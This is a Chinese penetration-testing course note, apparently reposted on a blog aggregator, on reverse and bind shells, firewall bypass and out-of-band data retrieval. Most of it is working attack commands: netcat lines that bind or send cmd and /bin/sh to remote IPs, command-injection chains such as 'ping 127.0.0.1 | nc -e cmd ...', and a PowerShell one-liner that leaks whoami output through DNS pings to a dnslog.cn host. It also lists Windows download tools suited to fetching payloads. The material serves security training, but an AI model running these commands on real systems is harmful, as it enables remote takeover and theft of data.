Day05:反弹SHELL不回显带外正反向连接防火墙出入站文件下载

目录

常规基本渗透命令

文件上传下载-解决无图形化&解决数据传输

反弹Shell命令-解决数据回显&解决数据通讯

防火墙绕过-正向连接&反向连接&内网服务器

防火墙组合数据不回显-ICMP带外查询Dnslog

思维导图

章节知识点:

应用架构:Web/APP/云应用/三方服务/负载均衡等

安全产品:CDN/WAF/IDS/IPS/蜜罐/防火墙/杀毒等

渗透命令:文件上传下载/端口服务/Shell反弹等

抓包技术:HTTP/TCP/UDP/ICMP/DNS/封包/代理等

算法加密:数据编码/密码算法/密码保护/反编译/加壳

常规基本渗透命令

需要掌握基本的Linux,CMD,POWERSHELL命令

【3】web安全入门篇-渗透测试中常用的命令_web安全入门篇 渗透测试中常用的命令-CSDN博客

文件上传下载-解决无图形化&解决数据传输

文件下载命令生成:[~]#棱角 ::Edge.Forum*

Linux:wget curl python ruby perl java等

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

反弹Shell命令-解决数据回显&解决数据通讯

反弹命令在线生成;[~]#棱角 ::Edge.Forum*

NC(ncat)瑞士军刀:linux系统下自带,windows下需要下载。

正向连接-Linux(控制机)控制Windows(被控制机)

# Windows绑定CMD到本地5566端口

nc -e cmd -lvvp 5566

# Linux主动连接目标5566

nc 10.10.10.1 5566

正向连接-Windows(控制机)控制Linux(被控制机)

# Linux绑定SH到本地5566端口

ncat -e /bin/sh -lvp 5566

# Windows主动连接目标5566

nc 10.10.10.1 5566

反向连接-Linux(被控制机)反向连接Windows(控制机)

# linux反弹windows上

ncat -e /bin/sh x.x.x.x 5566 

# Windows等待5566连接

nc -lvvp 5566

反向连接-Windows(被控制机)反向连接Linux(控制机)

# windows 反弹linux

nc -e cmd 10.10.10.146 5566 windows 反弹linux

# Linux等待5566连接

ncat -lvvp 5566

防火墙绕过-正向连接&反向连接&内网服务器

Windows防火墙规则:

入站:规则严格,规则设置允许才能通过

  • 出战:宽松,没有禁止就可以通过

管道符:| (管道符号) ||(逻辑或) &&(逻辑与)  &(后台任务符号)

Windows->| & || &&

Linux->; | || & && ``(特有``和;)

``可以包含命令并执行

例子:

ping -c 1 127.0.0.1 ; whoami
ping -c 1 127.0.0.1 | whoami
ping -c 1 127.0.0.1 || whoami
ping -c 1 127.0.0.1 & whoami
ping -c 1 127.0.0.1 && whoami
ping -c 1 127.0.0.1 `whoami

  1. 判断目标系统类型

  2. windows没有自带的nc,想办法上传nc 反弹权限

  3. 反弹

开启入站策略,采用反向连接

Linux:ncat -lvvp 5566

Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566

开启出站策略,采用正向连接

Linux:ncat -e cmd 47.122.23.131 5566

Windows:127.0.0.1 | nc -e cmd -lvvp 5566

正反向反弹案例-内网服务器

只能内网主动交出数据,反向连接

防火墙组合数据不回显-ICMP带外查询Dnslog

如果防火墙规则限制严格,入/出站都做了严格限制,只允许特定的服务医用通过,有漏洞数据不回显,可以把数据隐藏在ICMP协议中外带出去

绕过原理:ping命令走的ICMP协议,而防火墙禁用端口是控制TCP/UDP协议,也就是控制传输层,但是ICMP是网络层,是传输层下层,不受防火墙影响。所以可以使用ping命令将数据带出。

DNS平台:DNSLog Platform

ping 127.0.0.1 | powershell $x=whoami;$x=$x.Replace('\','xxx');$y='5t4zre.dnslog.cn';$z=$x+$y;ping $z

cmd无法执行whoami

用到powershell变量赋值 把whoami执行结果给变量

结果带有“\” 导致ping无法执行

powershell $x=whoami;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

127.0.0.1 | powershell $x=ver;$x=$x.Replace('\','xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

思维导图

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/712679.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Vue全家桶:vue2+vue3全部搞懂:第五篇,Vue的watch监视器

Vue全家桶:vue2+vue3全部搞懂:第五篇,Vue的watch监视器

前提,建议先学会前端几大基础:HTML、CSS、JS、Ajax,不然不好懂 这一专栏知识将一次性将vue、vue2、vue3全部讲明白 一、何为watch监视器 其实我个人理解,就跟原本的表单的input事件一样,实时监视事件发生并同步更新数…
阅读更多...
kswapd0挖矿病毒攻击记录

kswapd0挖矿病毒攻击记录

文章目录 一、起因与病毒分析1、起因2、阿里云告警2.1 恶意脚本代码执行12.2 恶意脚本代码执行22.3恶意脚本代码执行32.4 恶意脚本代码执行4 3、病毒简单分析3.1 病毒的初始化3.2 病毒本体执行 4、总结 二、ubuntu自救指南1、病毒清理2、如何防御 一、起因与病毒分析 1、起因 …
阅读更多...
3D城市模型可视化:开启智慧都市探索之旅

3D城市模型可视化:开启智慧都市探索之旅

随着科技的飞速发展,我们对城市的认知已经不再局限于平面的地图和照片。今天,让我们领略一种全新的城市体验——3D城市模型可视化。这项技术将带领我们走进一个立体、生动的城市世界,感受前所未有的智慧都市魅力。 3D城市模型通过先进的计算机…
阅读更多...
SLAM基础知识-高斯分布

SLAM基础知识-高斯分布

​​​​​​​正态分布(高斯分布)学习笔记 - 知乎 偏差(bias)、方差(variance)和噪音(noise)_noise variance-CSDN博客 --------------------------------------待更新---------------------------------------------------------------------------
阅读更多...
Android的硬件接口HAL

Android的硬件接口HAL

我一直觉得,现代计算机不是一门科学,起码快算不上一门理科科学。上上下下全是人造,左左右右全是生意,用管理学,经济学去学计算机,也许更看得懂很多问题。HAL就是一个典型例子。 传统Linux绕开了微软的霸权…
阅读更多...
图片的处理库Thumbnailator

图片的处理库Thumbnailator

摘要:最近遇到图片处理的问题,借助了Thumbnailator库,记录下使用步骤如下…… 图片处理,JDK中也提供了对应的工具类,不过处理较麻烦,Thumbnailator 是Google一个 开源Java 图像处理库,用于简化 …
阅读更多...
re正则表达式匹配单个字符串

re正则表达式匹配单个字符串

import retext001 "hello" a re.match(h,text001) print(a.group())text002 "hello" a re.match(.,text002) #匹配任意字符串 print(a.group())text003 "11111" a re.match(r\d, text003) #匹配任意数字 print(a.group())text004…
阅读更多...
网络-TCP关闭连接(close、shutdown)

网络-TCP关闭连接(close、shutdown)

在TCP协议中,关闭连接的过程可以通过shutdown函数和close函数来实现。 close close函数用于关闭一个socket描述符。实际上是对socket的引用计数-1,当引用计数为0时,就会被关闭。且是关闭两个方向的数据流。如果是多个进程共享一个socket描述…
阅读更多...
代码随想录三刷day10 | 栈与队列之 232.用栈实现队列 225. 用队列实现栈

代码随想录三刷day10 | 栈与队列之 232.用栈实现队列 225. 用队列实现栈

232.用栈实现队列 题目链接 解题思路&#xff1a;在pop的时候&#xff0c;操作就复杂一些&#xff0c;输出栈如果为空&#xff0c;就把进栈数据全部导入进来&#xff1b;peek的时候可以用this指针。 代码如下&#xff1a; class MyQueue { public:stack<int> stIn;sta…
阅读更多...
Oracle临时表应用

Oracle临时表应用

1.参考 oracle两种临时表的创建及使用方法_oracle 临时表-CSDN博客 【SQL】全局临时表 GLOBAL TEMPORARY TABLE-CSDN博客 2.语句 CREATE GLOBAL TEMPORARY TABLE tablename (columns) [ ON COMMIT PRESERVE | DELETE ROWS ] 3.应用 CREATE GLOBAL TEMPORARY TABLE "SE…
阅读更多...
嵌入式驱动学习第一周——内核的中断机制

嵌入式驱动学习第一周——内核的中断机制

前言 本文介绍中断机制&#xff0c;中断作为需要频繁使用的功能&#xff0c;本文将详细介绍linux内核中的中断机制。 嵌入式驱动学习专栏将详细记录博主学习驱动的详细过程&#xff0c;未来预计四个月将高强度更新本专栏&#xff0c;喜欢的可以关注本博主并订阅本专栏&#xff…
阅读更多...
初始Tomcat(Tomcat的基础介绍)

初始Tomcat(Tomcat的基础介绍)

目录 一、Tomcat的基本介绍 1、Tomcat是什么&#xff1f; 2、Tomcat的配置文件详解 3、Tomcat的构成组件 4、Tomcat的顶层架构 5、Tomcat的核心功能 6、Tomcat的请求过程 一、Tomcat的基本介绍 1、Tomcat是什么&#xff1f; Tomcat 服务器是一个免费的开放源代码的Web …
阅读更多...
【数据库管理系统】Mysql 8.0.36入门级安装

【数据库管理系统】Mysql 8.0.36入门级安装

下载地址 官方网址&#xff1a;MySQL 注意事项 建议不要安装最新版本&#xff0c;一般找mysql5.0或mysql8.0系列版本即可&#xff1b;mysq1官网有.zip和.msi两种安装形式&#xff1b;zip是压缩包&#xff0c;直接解压缩以后使用的&#xff0c;需要自己配置各种东西&#xff…
阅读更多...
912. 排序数组(堆排序)

912. 排序数组(堆排序)

堆排序&#xff1a; 声明全局堆长度建堆&#xff08;大顶堆&#xff09;从最后一个元素开始向前遍历&#xff0c;进行&#xff1a;1. 交换最后元素和堆顶元素&#xff1b;2. 全局堆长度-1&#xff1b;3. 调整大顶堆&#xff08;从第0个位置开始&#xff09; 建堆&#xff1a;…
阅读更多...
【递归搜索回溯专栏】前言与本专栏介绍

【递归搜索回溯专栏】前言与本专栏介绍

本专栏内容为&#xff1a;递归&#xff0c;搜索与回溯算法专栏。 通过本专栏的深入学习&#xff0c;你可以了解并掌握算法。 &#x1f493;博主csdn个人主页&#xff1a;小小unicorn ⏩专栏分类&#xff1a;递归搜索回溯专栏 &#x1f69a;代码仓库&#xff1a;小小unicorn的代…
阅读更多...
分享6个解决msvcp110.dll丢失的方法,全面解析msvcp110.dll文件

分享6个解决msvcp110.dll丢失的方法,全面解析msvcp110.dll文件

msvcp110.dll 是一个动态链接库 (DLL) 文件&#xff0c;属于 Microsoft Visual C 库的一部分&#xff0c;具体来说是 Microsoft Visual C 2012 版本的运行时组件。这个 DLL 文件包含了在 Windows 环境下运行用 C 编写的程序所必需的一些函数和资源。当一个应用程序是使用 Visua…
阅读更多...
视频拉流推流技术梳理

视频拉流推流技术梳理

概况 视频的整个流程主要分为推流和拉流 摄像头场景&#xff1a; 摄像头捕捉视频画面&#xff0c;推流到服务器&#xff0c;服务器分发到CDN&#xff0c; 客户端从CDN地址拉流&#xff0c;客户端进行播放 直播场景&#xff1a; 主播通过手机&#xff0c;电脑等客户端&…
阅读更多...
G8-ACGAN理论

G8-ACGAN理论

本文为&#x1f517;365天深度学习训练营 中的学习记录博客 原作者&#xff1a;K同学啊|接辅导、项目定制 我的环境&#xff1a; 1.语言&#xff1a;python3.7 2.编译器&#xff1a;pycharm 3.深度学习框架Pytorch 1.8.0cu111 一、对比分析 前面的文章介绍了CGAN&#xf…
阅读更多...
java基础(4)注解,集合,

java基础(4)注解,集合,

注解 什么是注解&#xff08;Annotation&#xff09;&#xff1f;注解是放在Java源码的类、方法、字段、参数前的一种特殊“注释” // this is a component: Resource("hello") public class Hello {Injectint n;PostConstructpublic void hello(Param String name…
阅读更多...
经典文献阅读之--CamMap(基于SLAM地图对不共视相机进行外参标定)

经典文献阅读之--CamMap(基于SLAM地图对不共视相机进行外参标定)

0. 简介 由于多相机之间通常存在有限或无重叠的视场&#xff0c;因此在估计外参相机参数时面临着一定的挑战&#xff0c;为了解决这个问题&#xff0c;本文提出了CamMap&#xff1a;一种新颖的6自由度外参标定流程。根据三个操作规则&#xff0c;使一个多相机系统单独捕捉一些…
阅读更多...
最新文章

Copyright @ 2022~2023